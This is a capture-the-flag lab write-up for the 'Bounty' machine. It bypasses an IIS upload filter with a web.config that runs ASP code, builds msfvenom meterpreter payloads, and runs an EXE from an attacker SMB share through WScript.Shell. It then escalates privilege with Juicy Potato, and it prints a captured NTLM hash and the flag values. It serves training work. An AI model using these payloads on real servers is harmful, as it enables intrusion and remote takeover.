Bounty
About
Bounty is an easy to medium difficulty machine, which features an interesting technique to bypass file uploader protections and achieve code execution. This machine also highlights the importance of keeping systems updated with the latest security patches.
Enumeration
Running the script portscan.sh reveals a single attack vector, HTTP.
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ sudo portscan.sh 10.129.51.54
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ cat PortScan\(10.129.51.54\)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Exploitation
HTTP
Running gobuster reveals a file transfer.aspx and a directory /UploadedFiles.
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ gobuster dir -u http://10.129.51.54 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x asp,aspx -t 32
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.51.54
[+] Method: GET
[+] Threads: 32
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: aspx,asp
[+] Timeout: 10s
===============================================================
2023/10/16 22:41:57 Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx (Status: 200) [Size: 941]
/UploadedFiles (Status: 301) [Size: 157] [--> http://10.129.51.54/UploadedFiles/]
/uploadedFiles (Status: 301) [Size: 157] [--> http://10.129.51.54/uploadedFiles/]
/uploadedfiles (Status: 301) [Size: 157] [--> http://10.129.51.54/uploadedfiles/]
===============================================================
2023/10/16 23:27:54 Finished
===============================================================
First, by checking the file transfer.aspx, I’m able to discover a web page where a file can be uploaded.
In order to check if the target has a unrestricted file upload vulnerability, I’ll create a ASPX reverse shell payload using msfvenom.
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f aspx -o exploit.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2874 bytes
Saved as: exploit.aspx
Unfortunately, file upload failed with an error message of Invalid File.
After some testing, I’m able to find that there is a file extension filter in place. With a bit of searching, I’m able to find that in IIS 7 and higher, web.config can be run as an ASP file according to Upload a web.config File for Fun & Profit. I’ll use the following POC script to test if this exploit is applicable in our case.
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
First, uploading the file did not show an error message, indicating that .config is not blacklisted by the filter in place.
Next, checking the uploaded file in the /UploadedFiles directory confirms that the file is successfully uploaded and that the file web.config is indeed run as an ASP file.
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ curl -s http://10.129.51.54/UploadedFiles/web.config | tail -n 3
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
-->3<!--
-->
With enough information gained, I’ll create an EXE reverse shell payload using msfvenom.
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe
Next, I’ll modify web.config to execute the created reverse shell payload through SMB service.
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
CreateObject("WScript.Shell").Exec("cmd.exe /c \\10.10.16.9\pwn\exploit.exe")
%>
-->
Finally, by uploading web.config once more and triggering the script, I’m able to gain a shell as the user NT AUTHORITY\SYSTEM.
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ curl -s http://10.129.51.54/UploadedFiles/web.config > /dev/null
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ smbserver.py pwn . -ip 10.10.16.9
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.51.54,49195)
[*] AUTHENTICATE_MESSAGE (BOUNTY\merlin,BOUNTY)
[*] User BOUNTY\merlin authenticated successfully
[*] merlin::BOUNTY:aaaaaaaaaaaaaaaa:09bf2571ddb163e76490fae8218caa7c:010100000000000000ceeb0bb300da018e2d5c6628f28b39000000000100100059005900560078006700750072004c000300100059005900560078006700750072004c00020010004a0058004b0046006700440056006f00040010004a0058004b0046006700440056006f000700080000ceeb0bb300da010600040002000000080030003000000000000000000000000030000040586ed7dcb978710623c686fe245248ac66dcf5f3befd9c0f6ae1be71b5dfbc0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Handle: The NETBIOS connection with the remote host timed out.
[*] Closing down connection (10.129.51.54,49195)
[*] Remaining connections []
┌──(m0nk3y@kali)-[~/HTB/Bounty]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.51.54
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.51.54:49196) at 2023-10-17 00:33:30 -0400
meterpreter > getuid
Server username: BOUNTY\merlin
Privilege Escalation
Checking the privilege shows that the user BOUNTY\merlin has SeImpersonatePrivilege which allows us to use Juicy Potato to gain SYSTEM privilege.
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Since we already have a meterpreter shell, I’ll use the Metasploit module exploit/windows/local/ms16_075_reflection_juicy instead to perform privilege escalation and gain a shell as the user NT AUTHORITY\SYSTEM.
meterpreter > run exploit/windows/local/ms16_075_reflection_juicy LHOST=10.10.16.9 LPORT=4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[+] Target appears to be vulnerable (Windows 2008 R2)
[*] Launching notepad to host the exploit...
[+] Process 2516 launched.
[*] Reflectively injecting the exploit DLL into 2516...
[*] Injecting exploit into 2516...
[*] Exploit injected. Injecting exploit configuration into 2516...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.51.54
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.51.54:49202) at 2023-10-17 00:46:48 -0400
[*] Session 2 created in the background.
meterpreter > sessions 2
[*] Backgrounding session 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
meterpreter > cat 'C:\Users\merlin\Desktop\user.txt'
1cb9ebf8a6d7eefa045f7b1e4db615a4
meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
a695aadcf210882e895422648e3079e4